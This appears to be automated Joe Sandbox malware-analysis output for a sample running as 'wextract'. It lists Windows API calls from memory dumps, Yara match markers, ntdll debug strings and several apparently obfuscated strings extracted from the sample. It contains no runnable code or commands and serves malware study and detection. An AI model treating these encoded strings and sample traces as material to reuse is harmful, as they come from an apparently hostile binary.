                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5C468B5C,00000007,00000000,00000004,00000000,00413A42,000000F4), ref: 0042948F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(00411696,?,004253D1,00411696,004253BF,004253D1,?,00411696,004253BF,00001000,?,?,00000000), ref: 0042943F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0041802C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0041802C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00411980,00427CFE,004253BF,0041194D), ref: 00417E23
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(?,00000111), ref: 00410A77
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID:
                                                                                  • API String ID: 1836367815-0
                                                                                  APIs
                                                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00411980,00427CFE,004253BF,0041194D), ref: 00417E23
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_wextract.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                  • API String ID: 0-3558027158
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (,.9$*.7*$*/91$,*.7$,7)9$-)*7$/-09$/7("$/9_A$1Npw$7)7+$9NVN$9WM9$RQMT$Rpm6$T6)7$Tvcp$U59u$Xiiu$^|zr$kp6,$pr|9$qkvt$uux6$v09Z$|6--$|N|{$}vnj
                                                                                  • API String ID: 0-1351462709
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $10g$(9$(s4(10p=,,05?=(532s$4(10w$10p=,,05?=(532s$+9>,$,05?$,2;p$-alr$-alr$2s/5$4=2;$9g*a$;298$;9s=$=(53$=;9s$>og-$alrk$dp=,$ep51$p51=$q9$?$vsvg
                                                                                  • API String ID: 0-798368912
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID: ___swprintf_l
                                                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                  • API String ID: 48624451-2108815105
                                                                                  Strings
                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04634655
                                                                                  • ExecuteOptions, xrefs: 046346A0
                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04634742
                                                                                  • Execute=1, xrefs: 04634713
                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 046346FC
                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04634787
                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04634725
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmp
                                                                                  • Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                  • API String ID: 0-484625025
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
• Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
Strings
• RTL: Re-Waiting, xrefs: 0463031E
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 046302BD
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 046302E7
Memory Dump Source
• Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
• Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
Strings
• RTL: Resource at %p, xrefs: 04637B8E
• RTL: Re-Waiting, xrefs: 04637BAC
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04637B7F
Memory Dump Source
• Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
• Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0463728C
Strings
• RTL: Resource at %p, xrefs: 046372A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04637294
• RTL: Re-Waiting, xrefs: 046372C1
Memory Dump Source
• Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
• Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
Strings
Memory Dump Source
• Source File: 0000000D.00000002.4141240769.00000000048E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_48e0000_wextract.jbxd
Similarity
• API ID:
• String ID: ."fg$dncv$exkr$g."`$p
• API String ID: 0-2351235189
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
• Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
Strings
Memory Dump Source
• Source File: 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, Offset: 04590000, based on PE: true
• Associated: 0000000D.00000002.4140587066.00000000046B9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.00000000046BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4590000_wextract.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280